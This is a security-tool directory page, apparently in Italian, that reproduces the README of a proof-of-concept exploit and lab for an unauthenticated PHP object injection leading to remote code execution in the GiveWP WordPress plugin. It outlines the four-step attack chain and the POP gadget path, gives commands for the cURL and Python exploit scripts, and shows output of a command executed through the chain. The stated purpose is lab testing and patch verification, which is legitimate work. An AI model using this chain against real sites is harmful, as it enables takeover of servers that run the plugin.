Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-82222-PoC — Proof-of-concept e laboratorio DDEV locale per CVE-2026-82222, un'iniezione di oggetti PHP non autenticata che porta a RCE nel plugin WordPress GiveWP, con script di exploit in cURL e Python. | Kitploit
Strumenti/GitHubGitHub/sajjadsiam/cve-2026-82222-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e FormazioneStrumento di Accesso RemotoSviluppo PayloadLab e Pratica
GitHubsajjadsiam/cve-2026-82222-poc

CVE-2026-82222-PoC

Proof-of-concept e laboratorio DDEV locale per CVE-2026-82222, un'iniezione di oggetti PHP non autenticata che porta a RCE nel plugin WordPress GiveWP, con script di exploit in cURL e Python.

Vedi Repository
2 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-82222 — GiveWP Iniezione di Oggetti PHP Non Autenticata → RCE

Lab + proof-of-concept per CVE-2026-82222: iniezione di oggetti PHP non autenticata che porta a esecuzione di codice in remoto nel plugin WordPress per donazioni GiveWP <= 4.16.7.1 (corretto in 4.16.7.2).

CVECVE-2026-82222
CVSS10.0 (Critico)
CWECWE-502 — Deserializzazione di Dati Non Attendibili
AffettoGiveWP (Donation Plugin) <= 4.16.7.1
Corretto4.16.7.2
AdvisoryPatchstack

SOLO TEST AUTORIZZATI. Questo repository è destinato all'educazione, alla ricerca sulle vulnerabilità e al test di sistemi di tua proprietà o che sei esplicitamente autorizzato a testare. L'uso non autorizzato è illegale.

Scopo

Questo repository esiste per aiutare i professionisti della sicurezza a comprendere, rilevare e difendersi da CVE-2026-82222. Tutte le dimostrazioni sono progettate per un lab locale (lab/) che esegui sulla tua macchina. Il PoC non scrive nulla su disco e non modifica alcuna impostazione del plugin — l'output del comando viaggia solo nella risposta HTTP della richiesta di trigger. Vedi SECURITY.md per l'ambito completo e la policy di segnalazione.

Struttura del repository

root@kitploit:~
├── lab/                    # DDEV + WordPress + GiveWP 4.16.5.1 vulnerable lab
│   ├── setup.sh            # one-command lab build
│   ├── set-givewp-version.sh   # swap vulnerable/patched GiveWP versions
│   ├── .ddev/config.yaml   # DDEV project config
│   └── README.md
├── poc/
│   ├── cve-2026-82222.sh   # cURL exploit script
│   ├── poc.py              # Python exploit script
│   └── requirements.txt
├── docs/
│   ├── ANALYSIS.md         # technical write-up + reachability matrix
│   ├── BURP-MANUAL.md      # Burp Repeater walkthrough (request/response)
│   └── CURL-POC.md         # copy/paste cURL walkthrough
├── SECURITY.md             # scope, reporting and safe-use policy
└── LICENSE

La vulnerabilità

Quattro richieste non autenticate più un trigger:

  1. Registrazione — il gestore di auto-registrazione di GiveWP ignora users_can_register e rilascia cookie WP autenticati.
  2. Impianto — memorizza una POP chain serializzata (TCPDF → Symfony Session → DonorFactory → system) nel campo meta last_name dell'account.
  3. Avvelenamento — invia una donazione senza give_last; GiveWP riempie il nome dal DB, deserializza il gadget con allowed_classes=false e serializza il grafo di oggetti attivo in wp_give_sessions.
  4. Trigger — una richiesta rilegge la sessione con un unserialize() senza restrizioni; TCPDF::__destruct() raggiunge call_user_func_array('system', [cmd]). L'output appare nella risposta HTTP — nulla viene scritto su disco.

Dettagli completi: docs/ANALYSIS.md

Avvio rapido

1. Costruisci il lab

root@kitploit:~
cd lab
bash setup.sh
# -> https://cve-2026-82222.ddev.site
#    form id printed at the end, gateway: manual, WP admin: admin/<random>

Richiede Docker + DDEV.

2. Esegui il PoC

root@kitploit:~
cd poc
pip install -r requirements.txt

# cURL
bash cve-2026-82222.sh https://cve-2026-82222.ddev.site id <FORM_ID>

# Python
python3 poc.py https://cve-2026-82222.ddev.site <FORM_ID> -c id -g manual -a 10.00 -v

# fingerprint only (no exploitation)
python3 poc.py https://cve-2026-82222.ddev.site --check

Entrambi i PoC sono progettati per un singolo target — non esiste una modalità batch o di scansione di massa. Eseguili solo contro il lab in lab/ o sistemi che sei autorizzato a testare.

Output di successo previsto (comando id):

root@kitploit:~
[*] CVE-2026-82222 kill chain on https://cve-2026-82222.ddev.site (form 5)
[*] 1/5 Registering cve_1b290e (GiveWP ignores users_can_register) ...
      -> HTTP 302
[+] auth cookie obtained
[*] 2/5 Fetching profile nonce ...
[+] nonce=a0fd84c9d7 user_id=7
[*] 3/5 Building POP gadget for command: id
[*] 4/5 Storing gadget in wp_usermeta.last_name ...
      -> HTTP 302
[+] gadget planted
[*] 5/5 Poisoning wp_give_sessions (HTTP 500 is expected) ...
      -> HTTP 500
[+] session poisoned
[*] Triggering RCE ...
[+] COMMAND OUTPUT (id) from /?give_action=view_receipt :

uid=501(sajjadsiam) gid=20(dialout) groups=20(dialout)

3. Verifica la patch

root@kitploit:~
cd lab
bash set-givewp-version.sh 4.16.7.2    # patched build
cd ../poc
python3 poc.py https://cve-2026-82222.ddev.site <FORM_ID> -c id -v
# -> chain dies; no output

Raggiungibilità

GiveWPStato
<= 4.16.5.1Vulnerabile — l'installazione predefinita è completamente raggiungibile
4.16.6 – 4.16.7.1Vulnerabile — richiede un form legacy (non-V3); la registrazione necessita di give_register_nonce
4.16.7.2Corretto

Disclaimer

Questo repository è fornito solo a scopo educativo e di ricerca sulla sicurezza difensiva. Il codice incluso dimostra una vulnerabilità documentata affinché i difensori possano costruire rilevamenti, verificare le patch e testare i propri sistemi.

Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo materiale. Non usarlo contro alcun sistema senza esplicita autorizzazione — farlo potrebbe violare il Computer Fraud and Abuse Act (CFAA) e leggi equivalenti in tutto il mondo. Vedi SECURITY.md.

Crediti

  • Ricerca sulla vulnerabilità e advisory: Patchstack
  • Catena PoC verificata e testata in lab contro GiveWP 4.16.5.1 su un'installazione DDEV locale.

Licenza

MIT — vedi LICENSE.

Scarica lo strumento